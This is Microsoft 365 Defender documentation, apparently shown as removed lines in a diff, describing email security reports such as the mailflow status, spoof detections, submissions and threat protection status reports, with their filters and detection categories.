-In all Microsoft 365 organizations, a variety of reports are available to help you see how email security features are protecting your organization. If you have the [necessary permissions](#what-permissions-are-needed-to-view-these-reports), you can view and download these reports as described in this article.
-
-The reports are available in the Microsoft Defender portal at <https://security.microsoft.com> on the **Email & collaboration reports** page at **Reports** \> **Email & collaboration** \> **Email & collaboration reports**. Or, to go directly to the **Email & collaboration reports** page, use <https://security.microsoft.com/emailandcollabreport>.
-
-Summary information for each report is available on the page. Identify the report you want to view, and then select **View details** for that report.
-
-The rest of this article describes the reports that are exclusive to Defender for Office 365.
-
-> [!NOTE]
->
-> - Some of the reports on the **Email & collaboration reports** page are exclusive to Microsoft Defender for Office 365. For information about these reports, see [View Defender for Office 365 reports in the Microsoft Defender portal](reports-defender-for-office-365.md).
->
-> - Reports that are related to mail flow are now in the Exchange admin center. For more information about these reports, see [Mail flow reports in the new Exchange admin center](/exchange/monitoring/mail-flow-reports/mail-flow-reports).
->
-> A link to these reports is available in the Defender portal at **Reports** \> **Email & collaboration** \> **Email & collaboration reports** \> **Exchange mail flow reports**, which takes you to <https://admin.exchange.microsoft.com/#/reports/mailflowreportsmain>.
-
-## Email security report changes in the Microsoft Defender portal
-
-The Exchange Online Protection (EOP) and Microsoft Defender for Office 365 reports in the Microsoft Defender portal that have been replaced, moved, or deprecated are described in the following table.
-
-|Deprecated report and cmdlets|New report and cmdlets|Message Center ID|Date|
-|||::|::|
-|**URL trace** <br><br> Get-URLTrace|[URL protection report](reports-defender-for-office-365.md#url-protection-report) <br><br> [Get-SafeLinksAggregateReport](/powershell/module/exchange/get-safelinksaggregatereport) <br> [Get-SafeLinksDetailReport](/powershell/module/exchange/get-safelinksdetailreport)|MC239999|June 2021|
-|**Sent and received email report** <br><br> Get-MailTrafficReport <br> Get-MailDetailReport|[Threat protection status report](#threat-protection-status-report) <br> [Mailflow status report](#mailflow-status-report) <br><br> [Get-MailTrafficATPReport](/powershell/module/exchange/get-mailtrafficatpreport) <br> [Get-MailDetailATPReport](/powershell/module/exchange/get-maildetailatpreport) <br> [Get-MailFlowStatusReport](/powershell/module/exchange/get-mailflowstatusreport)|MC236025|June 2021|
-|**Forwarding report** <br><br> no cmdlets|[Auto-forwarded messages report in the EAC](/exchange/monitoring/mail-flow-reports/mfr-auto-forwarded-messages-report) <br><br> no cmdlets|MC250533|June 2021|
-|**Safe Attachments file types report** <br><br> Get-AdvancedThreatProtectionTrafficReport <br> Get-MailDetailMalwareReport|[Threat protection status report: View data by Email \> Malware](#view-data-by-email--malware-and-chart-breakdown-by-detection-technology) <br><br> [Get-MailTrafficATPReport](/powershell/module/exchange/get-mailtrafficatpreport) <br> [Get-MailDetailATPReport](/powershell/module/exchange/get-maildetailatpreport)|MC250532|June 2021|
-|**Safe Attachments message disposition report** <br><br> Get-AdvancedThreatProtectionTrafficReport <br> Get-MailDetailMalwareReport|[Threat protection status report: View data by Email \> Malware](#view-data-by-email--malware-and-chart-breakdown-by-detection-technology) <br><br> [Get-MailTrafficATPReport](/powershell/module/exchange/get-mailtrafficatpreport) <br> [Get-MailDetailATPReport](/powershell/module/exchange/get-maildetailatpreport)|MC250531|June 2021|
-|**Malware detected in email report** <br><br> Get-MailTrafficReport <br> Get-MailDetailMalwareReport|[Threat protection status report: View data by Email \> Malware](#view-data-by-email--malware-and-chart-breakdown-by-detection-technology) <br><br> [Get-MailTrafficATPReport](/powershell/module/exchange/get-mailtrafficatpreport) <br> [Get-MailDetailATPReport](/powershell/module/exchange/get-maildetailatpreport)|MC250530|June 2021|
-|**Spam detection report** <br><br> Get-MailTrafficReport <br> Get-MailDetailSpamReport|[Threat protection status report: View data by Email \> Spam](#view-data-by-email--spam-and-chart-breakdown-by-detection-technology) <br><br> [Get-MailTrafficATPReport](/powershell/module/exchange/get-mailtrafficatpreport) <br> [Get-MailDetailATPReport](/powershell/module/exchange/get-maildetailatpreport)|MC250529|October 2021|
-|Get-AdvancedThreatProtectionDocumentReport <br><br> Get-AdvancedThreatProtectionDocumentDetail|[Get-ContentMalwareMdoAggregateReport](/powershell/module/exchange/get-contentmalwaremdoaggregatereport) <br><br> [Get-ContentMalwareMdoDetailReport](/powershell/module/exchange/get-contentmalwaremdodetailreport)|MC343433|May 2022|
-|**Exchange transport rule report** <br><br> [Get-MailTrafficPolicyReport](/powershell/module/exchange/get-mailtrafficpolicyreport) <br> [Get-MailDetailTransportRuleReport](/powershell/module/exchange/get-maildetailtransportrulereport)|[Exchange transport rule report in the EAC](/exchange/monitoring/mail-flow-reports/mfr-exchange-transport-rule-report) <br><br> [Get-MailTrafficPolicyReport](/powershell/module/exchange/get-mailtrafficpolicyreport) <br> [Get-MailDetailTransportRuleReport](/powershell/module/exchange/get-maildetailtransportrulereport)|MC316157|April 2022|
-|Get-MailTrafficTopReport|[Top senders and recipient report](reports-email-security.md#top-senders-and-recipients-report) <br><br> [Get-MailTrafficSummaryReport](/powershell/module/exchange/get-mailtrafficsummaryreport) <br><br> **Note**: There's no replacement for the encryption reporting capabilities in Get-MailTrafficTopReport.|MC315742|April 2022|
-
-## Compromised users report
-
-The **Compromised users** report shows the number of user accounts that were marked as **Suspicious** or **Restricted** within the last 7 days. Accounts in either of these states are problematic or even compromised. With frequent use, you can use the report to spot spikes, and even trends, in suspicious or restricted accounts. For more information about compromised users, see [Responding to a compromised email account](responding-to-a-compromised-email-account.md).
--
-The aggregate view shows data for the last 90 days and the detail view shows data for the last 30 days.
-
-On the **Email & collaboration reports** page at <https://security.microsoft.com/emailandcollabreport>, find **Compromised users**, and then select **View details**. Or, to go directly to the report, use <https://security.microsoft.com/reports/CompromisedUsers>.
-
-On the **Compromised users** page, the chart shows the following information for the specified date range:
--- **Restricted**: The user account has been restricted from sending email due to highly suspicious patterns.-- **Suspicious**: The user account has sent suspicious email and is at risk of being restricted from sending email.--
-The details table below the graph shows the following information:
--- **Creation time**-- **User ID**-- **Action**-- **Tags**: For more information about user tags, see [User tags](user-tags-about.md).-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report and the details table by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)**: **Start date** and **End date**.-- **Activity**: **Restricted** or **Suspicious**-- **Tag**: Select **All** or the specified user tag (including Priority account). For more information, see [User tags](user-tags-about.md).-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-On the **Compromised users** page, the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **[Create schedule](#schedule-recurring-reports)**, :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Request report](#request-on-demand-reports-for-download)**, and :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Export](#export-report-data)** actions are available.
-
-## Exchange transport rule report
-
-> [!NOTE]
-> The **Exchange transport rule report** is now available in the EAC. For more information, see [Exchange transport rule report in the new EAC](/exchange/monitoring/mail-flow-reports/mfr-exchange-transport-rule-report).
-
-## Forwarding report
-
-> [!NOTE]
-> This report is now available in the EAC. For more information, see [Auto forwarded messages report in the new EAC](/exchange/monitoring/mail-flow-reports/mfr-auto-forwarded-messages-report).
-
-## Mailflow status report
-
-The **Mailflow status report** is a smart report that shows information about incoming and outgoing email, spam detections, malware, email identified as "good", and information about email allowed or blocked on the edge. This is the only report that contains edge protection information. The report shows how much email is blocked before entering the service for examination by Exchange Online Protection (EOP) or Defender for Microsoft 365.
-
-> [!TIP]
-> If a message is sent to five recipients, we count it as five different messages, not one message.
-
-On the **Email & collaboration reports** page at <https://security.microsoft.com/emailandcollabreport>, find **Mailflow status summary**, and then select **View details**. Or, to go directly to the report, use <https://security.microsoft.com/reports/mailflowStatusReport>.
--
-The available views in the **Mailflow status report** are described in the following subsections.
-
-### Type view for the Mailflow status report
--
-On the **Mailflow status report** page, the **Type** tab is selected by default. The chart shows the following information for the specified date range:
--- **Malware**: Email that's blocked as malware by various filters.-- **Total**-- **Good mail**: Email that's determined not to be spam or that's allowed by user or organizational policies.-- **Phishing email**: Email that's blocked as phishing by various filters.-- **Spam**: Email that's blocked as spam by various filters.-- **Edge protection**: Email that's rejected at the edge/perimeter before examination by EOP or Defender for Office 365.-- **Rule messages**: Email messages that were quarantined by mail flow rules (also known as transport rules).-- **Data loss prevention**: Email messages that were quarantined by [data loss prevention (DLP) policies](/purview/dlp-learn-about-dlp).-
-The details table below the graph shows the following information:
--- **Direction**-- **Type**-- **24 hours**-- **3 days**-- **7 days**-- **15 days**-- **30 days**-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report and the details table by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)**: **Start date** and **End date**.-- **Mail direction**: Select **Inbound**, **Outbound**, and **Intra-org**.-- **Type**: Select one or more of the following values:
- - **Good mail**
- - **Malware**
- - **Spam**
- - **Edge protection**
- - **Rule messages**
- - **Phishing email**
- - **Data loss prevention**
-- **Domain**: Select **All** or an [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-On the **Type** tab, select **Choose a category for more details** to see more information:
--- **Phishing email**: This selection takes you to [View data by Email \> Phish and Chart breakdown by Detection Technology](#view-data-by-email--phish-and-chart-breakdown-by-detection-technology) in the Threat protection status report.-- **Malware in email**: This selection takes you to [View data by Email \> Malware and Chart breakdown by Detection Technology](#view-data-by-email--malware-and-chart-breakdown-by-detection-technology) in the Threat protection status report.-- **Spam detections**: This selection takes you to [View data by Email \> Spam and Chart breakdown by Detection Technology](#view-data-by-email--spam-and-chart-breakdown-by-detection-technology) in the Threat protection status report.-
-On the ***Type** tab, the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **[Create schedule](#schedule-recurring-reports)** and :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Export](#export-report-data)** actions are available.
-
-### Direction view for the Mailflow status report
--
-On the **Direction** tab, the chart shows the following information for the specified date range:
--- **Inbound**-- **Intra-org**-- **Outbound**-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report and the details table by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)**: **Start date** and **End date**.-- **Mail direction**: Select **Inbound**, **Outbound**, and **Intra-org**.-- **Type**: Select one or more of the following values:
- - **Good mail**
- - **Malware**
- - **Spam**
- - **Edge protection**
- - **Rule messages**
- - **Phishing email**
- - **Data loss prevention**: Email messages that were quarantined by [data loss prevention (DLP) policies](/purview/dlp-learn-about-dlp).
-- **Domain**: Select **All** or an [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-On the **Direction** tab, select **Choose a category for more details** to see more information:
--- **Phishing email**: This selection takes you to [View data by Email \> Phish and Chart breakdown by Detection Technology](#view-data-by-email--phish-and-chart-breakdown-by-detection-technology) in the Threat protection status report.-- **Malware in email**: This selection takes you to [View data by Email \> Malware and Chart breakdown by Detection Technology](#view-data-by-email--malware-and-chart-breakdown-by-detection-technology) in the Threat protection status report.-- **Spam detections**: This selection takes you to [View data by Email \> Spam and Chart breakdown by Detection Technology](#view-data-by-email--spam-and-chart-breakdown-by-detection-technology) in the Threat protection status report.-
-On the **Direction** tab, the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create schedule** and :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** actions are available.
-
-### Mailflow view for the Mailflow status report
-
-The **Mailflow** tab shows you how Microsoft's email threat protection features filter incoming and outgoing email in your organization. This view uses a horizontal flow diagram (known as a _Sankey_ diagram) to provide details on the total email count, and how threat protection features affect this count.
--
-The aggregate view and details table view allow for 90 days of filtering.
-
-The information in the diagram is color-coded by **EOP** and **Defender for Office 365** technologies.
-
-The diagram is organized into the following horizontal bands:
--- **Total email** band: This value is always shown first.-- **Edge block** and **Processed** band:
- - **Edge block**: Messages that were filtered at the edge and identified as Edge Protection.
- - **Processed**: Messages that were handled by the filtering stack.
-- Outcomes band:
- - **Data loss prevention block**
- - **Rule Block**: Messages that were quarantined by Exchange mail flow rules (transport rules).
- - **Malware block**: Messages that were identified as malware.<sup>\*</sup>
- - **Phishing block**: Messages that were identified as phishing.<sup>\*</sup>
- - **Spam block**: Messages that were identified as spam.<sup>\*</sup>
- - **Impersonation block**: Messages that were detected as user impersonation or domain impersonation in Defender for Office 365.<sup>\*</sup>
- - **Detonation block**: Messages that were detected during file or URL detonation by Safe Attachments policies or Safe Links policies in Defender for Office 365.<sup>\*</sup>
- - **ZAP removed**: Messages that were removed by zero-hour auto purge (ZAP).<sup>\*</sup>
- - **Delivered**: Messages that were delivered to users due to an allow.<sup>\*</sup>
-
-If you hover over a horizontal band in the diagram, you see the number of related messages.
-
-<sup>\*</sup> If you select this element, the diagram expands to show further details. For a description of each element in the expanded nodes, see [Detection technologies](/office/office-365-management-api/office-365-management-activity-api-schema#detection-technologies).
--
-The details table below the diagram shows the following information:
--- **Date (UTC)**-- **Total email**-- **Edge filtered**-- **Rule messages**-- **Anti-malware engine, Safe Attachments, rule filtered**-- **DMARC impersonation, spoof, phish filtered**-- **Detonation detection**-- **Anti-spam filtered**-- **ZAP removed**-- **Messages where no threats were detected**-
-Select a row in the details table to see a further breakdown of the email counts in the details flyout that opens.
-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report and the details table by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)** **Start date** and **End date**.-- **Mail direction**: Select **Inbound**, **Outbound**, and **Intra-org**.-- **Domain**: Select **All** or an [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-On the **Mailflow** tab, select :::image type="icon" source="../../media/m365-cc-sc-show-trends-icon.png" border="false"::: **Show trends** to see trend graphs in the **Mailflow trends** flyout that opens.
--
-On the **Mailflow** tab, the :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** action is available.
-
-## Malware detections report
-
-> [!NOTE]
-> This report has been deprecated. The same information is available in the [Threat protection status report](#threat-protection-status-report).
-
-## Mail latency report
-
-The **Mail latency report** in Defender for Office 365 contains information on the mail delivery and detonation latency experienced within your organization. For more information, see [Mail latency report](reports-defender-for-office-365.md#mail-latency-report).
-
-## Post-delivery activities report
-
-The **Post-delivery activities** report is available only in organizations with Microsoft Defender for Office 365 Plan 2. For information about the report, see [Post-delivery activities report](reports-defender-for-office-365.md#post-delivery-activities-report).
-
-## Spam detections report
-
-> [!NOTE]
-> This report has been deprecated. The same information is available in the [Threat protection status report](#threat-protection-status-report).
-
-## Spoof detections report
-
-The **Spoof detections** report shows information about messages that were blocked or allowed due to spoofing. For more information about spoofing, see [Anti-spoofing protection in EOP](anti-phishing-protection-spoofing-about.md).
-
-The aggregate and detail views of the report allows for 90 days of filtering.
-
-> [!NOTE]
-> The latest available data in the report is 3 to 4 days old.
-
-On the **Email & collaboration reports** page at <https://security.microsoft.com/emailandcollabreport>, find **Spoof detections**, and then select **View details**. Or, to go directly to the report, use <https://security.microsoft.com/reports/SpoofMailReport>.
--
-The chart shows the following information:
--- **Pass**-- **Fail**-- **SoftPass**-- **None**-- **Other**-
-Hover over a day (data point) in the chart to see how many spoofed messages were detected and why.
-
-The details table below the graph shows the following information:
--- **Date**-- **Spoofed user**-- **Sending infrastructure**-- **Spoof type**-- **Result**-- **Result code**-- **SPF**-- **DKIM**-- **DMARC**-- **Message count**-
- To see all columns, you likely need to do one or more of the following steps:
-
- - Horizontally scroll in your web browser.
- - Narrow the width of appropriate columns.
- - Zoom out in your web browser.
-
-For more information about composite authentication result codes, see [Anti-spam message headers in Microsoft 365](message-headers-eop-mdo.md).
-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report and the details table by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)** **Start date** and **End date**-- **Result**:
- - **Pass**
- - **Fail**
- - **SoftPass**
- - **None**
- - **Other**
-- **Spoof type**: **Internal** and **External**-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-On the **Spoof mail report** page, the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **[Create schedule](#schedule-recurring-reports)**, :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Request report](#request-on-demand-reports-for-download)**, and :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Export](#export-report-data)** actions are available.
--
-## Submissions report
-
-The **Submissions** report shows information about items that admins have reported to Microsoft for analysis for the last 30 days. For more information about admin submissions, see [Use Admin Submission to submit suspected spam, phish, URLs, and files to Microsoft](submissions-admin.md).
-
-On the **Email & collaboration reports** page at <https://security.microsoft.com/emailandcollabreport>, find **Submissions**, and then select **View details**. Or, to go directly to the report, use <https://security.microsoft.com/adminSubmissionReport>.
-
-To go directly to the **Submissions** page in the Defender portal, select **Go to submissions**.
--
-The chart shows the following information:
--- **Pending**-- **Completed**-
-The details table below the graph shows the same information and has the same available actions actions as the **Emails** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=email>:
--- :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns**-- :::image type="icon" source="../../media/m365-cc-sc-group-icon.png" border="false"::: **Group**-- :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Submit to Microsoft for analysis**-
-For more information, see [View email admin submissions to Microsoft](submissions-admin.md#view-email-admin-submissions-to-microsoft).
-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report and the details table by selecting one or more of the following values in the flyout that opens:
--- **Date submitted**: **Start date** and **End date**-- **Submission ID**-- **Network Message ID**-- **Sender**-- **Recipient**-- **Submission name**-- **Submitted by**-- **Reason for submitting**:
- - **Not junk**
- - **Appears clean**
- - **Appears suspicious**
- - **Phish**
- - **Malware**
- - **Spam**
-- **Rescan status**:
- - **Pending**
- - **Completed**
-- **Tags**: **All** or one or more [user tags](user-tags-about.md).-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-On the **Submissions** page, the **[Export](#export-report-data)** action is available.
--
-## Threat protection status report
-
-The **Threat protection status** report is available in both EOP and Defender for Office 365. However, the reports contain different data. For example, EOP customers can view information about malware detected in email, but not information about malicious files detected by [Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-about.md).
-
-The report provides the count of email messages with malicious content. For example:
--- Files or website addresses (URLs) that were blocked by the anti-malware engine.-- Files or messages affected by [zero-hour auto purge (ZAP)](zero-hour-auto-purge.md)-- Files or messages that were blocked by Defender for Office 365 features: [Safe Links](safe-links-about.md), [Safe Attachments](safe-attachments-about.md), and [impersonation protection features in anti-phishing policies](anti-phishing-policies-about.md#exclusive-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).-
-You can use the information in this report to identify trends or determine whether your organizational policies need adjustment.
-
-> [!TIP]
-> if a message is sent to five recipients, we count it as five different messages, not one message.
-
-On the **Email & collaboration reports** page at <https://security.microsoft.com/emailandcollabreport>, find **Submissions**, and then select **View details**. Or, to go directly to the report, use one of the following URLS:
--- **Defender for Office 365**: <https://security.microsoft.com/reports/TPSAggregateReportATP>-- **EOP**: <https://security.microsoft.com/reports/TPSAggregateReport>--
-By default, the chart shows data for the past seven days. Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** on the **Threat protection status report** page to select a 90 day date range (trial subscriptions might be limited to 30 days). The details table allows filtering for 30 days.
-
-The available views are described in the following subsections.
-
-### View data by Overview
--
-In the **View data by Overview** view, the following detection information is shown in the chart:
--- **Email malware**-- **Email phish**-- **Email spam**-- **Content malware** (Defender for Office 365 only: Files detected by [Built-in virus protection in SharePoint Online, OneDrive, and Microsoft Teams](anti-malware-protection-for-spo-odfb-teams-about.md) and [Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-about.md))-
-No details table is available below the chart.
-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)** **Start date** and **End date**.-- **Detection**: The same values as in the chart.-- **Protected by**: **MDO** (Defender for Office 365) and **EOP**.-- **Tag**: Leave the value **All** or remove it, double-click in the empty box, and then select **Priority account**. For more information about user tags, see [User tags](user-tags-about.md).-- **Direction**: Leave the value **All** or remove it, double-click in the empty box, and then select **Inbound**, **Outbound**, or **Intra-org**.-- **Domain**: Leave the value **All** or remove it, double-click in the empty box, and then select an [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).-- **Policy type**: Leave the value **All** or remove it, double-click in the empty box, and then select one of the following values:
- - **Anti-malware**
- - **Safe Attachments**
- - **Anti-phish**
- - **Anti-spam**
- - **Mail flow rule** (transport rule)
- - **Others**
-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-### View data by Email \> Phish and Chart breakdown by Detection Technology
--
-> [!NOTE]
-> In May 2021, phishing detections in email were updated to include **message attachments** that contain phishing URLs. This change might shift some of the detection volume out of the **View data by Email \> Malware** view and into the **View data by Email \> Phish** view. In other words, message attachments with phishing URLs that were traditionally identified as malware now might be identified as phishing instead.
-
-In the **View data by Email \> Phish** and **Chart breakdown by Detection Technology** view, the following information is shown in the chart:
--- **Advanced filter**: Phishing signals based on machine learning.-- **Campaign**<sup>\*</sup>: Messages identified as part of a [campaign](campaigns.md).-- **File detonation**<sup>\*</sup>: [Safe Attachments](safe-attachments-about.md) detected a malicious attachment during detonation analysis.-- **File detonation reputation**<sup>\*</sup>: File attachments previously detected by [Safe Attachments](safe-attachments-about.md) detonations in other Microsoft 365 organizations.-- **File reputation**: The message contains a file that was previously identified as malicious in other Microsoft 365 organizations.-- **Fingerprint matching**: The message closely resembles a previous detected malicious message.-- **General filter**: Phishing signals based on analyst rules.-- **Impersonation brand**: Sender impersonation of well-known brands.-- **Impersonation domain**<sup>\*</sup>: Impersonation of sender domains that you own or specified for protection in [anti-phishing policies](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).-- **Impersonation user**<sup>\*</sup>: Impersonation of protected senders that you specified in [anti-phishing policies](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365) or learned through mailbox intelligence.-- **Mailbox intelligence impersonation**<sup>\*</sup>: Impersonation detections from mailbox intelligence in [anti-phishing policies](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).-- **Mixed analysis detection**: Multiple filters contributed to the message verdict.-- **Spoof DMARC**: The message failed [DMARC authentication](email-authentication-dmarc-configure.md).-- **Spoof external domain**: Sender email address spoofing using a domain that's external to your organization.-- **Spoof intra-org**: Sender email address spoofing using a domain that's internal to your organization.-- **URL detonation**<sup>\*</sup>: [Safe Links](safe-links-about.md) detected a malicious URL in the message during detonation analysis.-- **URL detonation reputation**<sup>\*</sup>: URLs previously detected by [Safe Links](safe-links-about.md) detonations in other Microsoft 365 organizations.-- **URL malicious reputation**: The message contains a URL that was previously identified as malicious in other Microsoft 365 organizations.-
-<sup>\*</sup> Defender for Office 365 only
-
-In the details table below the chart, the following information is available:
--- **Date**-- **Subject**-- **Sender**-- **Recipients**-- **Detection technology**: The same detection technology values from the chart.-- **Delivery status**-- **Sender IP**-- **Tags**: For more information about user tags, see [User tags](user-tags-about.md).-
-To see all columns, you likely need to do one or more of the following steps:
--- Horizontally scroll in your web browser.-- Narrow the width of appropriate columns.-- Zoom out in your web browser.-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)**: **Start date** and **End date**-- **Detection**: The same values as in the chart.-- **Priority account protection**: **Yes** and **No**. For more information, see [Configure and review priority account protection in Microsoft Defender for Office 365](priority-accounts-turn-on-priority-account-protection.md).-- **Evaluation**: **Yes** or **No**.-- **Protected by**: **MDO** (Defender for Office 365) and **EOP**-- **Direction**: Leave the value **All** or remove it, double-click in the empty box, and then select **Inbound**, **Outbound**, or **Intra-org**.-- **Tag**: Leave the value **All** or remove it, double-click in the empty box, and then select **Priority account**. For more information about user tags, see [User tags](user-tags-about.md).-- **Domain**: Leave the value **All** or remove it, double-click in the empty box, and then select an [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).-- **Policy type**: Select **All** or one of the following values:
- - **Anti-malware**
- - **Safe Attachments**
- - **Anti-phish**
- - **Anti-spam**
- - **Mail flow rule** (transport rule)
- - **Others**
-- **Policy name (details table view only)**: Select **All** or a specific policy.-- **Recipients (separated by commas)**-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-If you select an entry from the details table by clicking anywhere in the row other than the check box next to the first column, an email details flyout opens. This details flyout is known as the _Email summary panel_ and contains summarized information that's also available on the [Email entity page in Defender for Office 365](mdo-email-entity-page.md) for the message. For details about the information in the Email summary panel, see [The Email summary panel](mdo-email-entity-page.md#the-email-summary-panel).
-
-In Defender for Microsoft 365, the following actions are available at the top of the Email summary panel for the Threat protection status report:
--- :::image type="icon" source="../../medi).-- :::image type="icon" source="../../medi#remediate-using-take-action).-
-On the **Threat protection status** page, the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **[Create schedule](#schedule-recurring-reports)**, :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Request report](#request-on-demand-reports-for-download)**, and :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Export](#export-report-data)** actions are available.
-
-### View data by Email \> Spam and Chart breakdown by Detection Technology
--
-In the **View data by Email \> Spam** and **Chart breakdown by Detection Technology** view, the following information is shown in the chart:
--- **Advanced filter**: Phishing signals based on machine learning.-- **Bulk**: The [bulk complaint level (BCL)](anti-spam-bulk-complaint-level-bcl-about.md) of the message exceeds the defined threshold for spam.-- **Domain reputation**: The message was from a domain that was previously identified as sending spam in other Microsoft 365 organizations.-- **Fingerprint matching**: The message closely resembles a previous detected malicious message.-- **General filter**-- **IP reputation**: The message was from a source that was previously identified as sending spam in other Microsoft 365 organizations.-- **Mixed analysis detection**: Multiple filters contributed to the verdict for the message.-- **URL malicious reputation**: The message contains a URL that was previously identified as malicious in other Microsoft 365 organizations.-
-In the details table below the chart, the following information is available:
--- **Date**-- **Subject**-- **Sender**-- **Recipients**-- **Detection technology**: The same detection technology values from the chart.-- **Delivery status**-- **Sender IP**-- **Tags**: For more information about user tags, see [User tags](user-tags-about.md).-
-To see all columns, you likely need to do one or more of the following steps:
--- Horizontally scroll in your web browser.-- Narrow the width of appropriate columns.-- Zoom out in your web browser.-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)** **Start date** and **End date**-- **Detection**: The same values as in the chart.-- **Bulk complaint level**: When the **Detection** value **Bulk** is selected, the slider is available to filter the report by the selected BCL range. You can use this information to confirm or adjust the BCL threshold in anti-spam policies to allow more or less bulk email into your organization.-
- If the **Detection** value **Bulk** isn't selected, the slider is grayed-out and bulk detections aren't included in the report.
--- **Priority account protection**: **Yes** and **No**. For more information, see [Configure and review priority account protection in Microsoft Defender for Office 365](priority-accounts-turn-on-priority-account-protection.md).-- **Direction**: **All** or enter **Inbound**, **Outbound** and **Intra-org**.-- **Direction**: Leave the value **All** or remove it, double-click in the empty box, and then select **Inbound**, **Outbound**, or **Intra-org**.-- **Tag**: Leave the value **All** or remove it, double-click in the empty box, and then select **Priority account**. For more information about user tags, see [User tags](user-tags-about.md).-- **Domain**: Leave the value **All** or remove it, double-click in the empty box, and then select an [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).-- **Policy type**: Select **All** or one of the following values:
- - **Anti-malware**
- - **Safe Attachments**
- - **Anti-phish**
- - **Anti-spam**
- - **Mail flow rule** (transport rule)
- - **Others**
-- **Policy name (details table view only)**: Select **All** or a specific policy.-- **Recipients**-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-If you select an entry from the details table by clicking anywhere in the row other than the check box next to the first column, an email details flyout opens. This details flyout is known as the _Email summary panel_ and contains summarized information that's also available on the [Email entity page in Defender for Office 365](mdo-email-entity-page.md) for the message. For details about the information in the Email summary panel, see [The Email summary panel](mdo-email-entity-page.md#the-email-summary-panel).
-
-In Defender for Microsoft 365, the following actions are available at the top of the Email summary panel for the Threat protection status report:
--- :::image type="icon" source="../../medi).-- :::image type="icon" source="../../medi#remediate-using-take-action).-
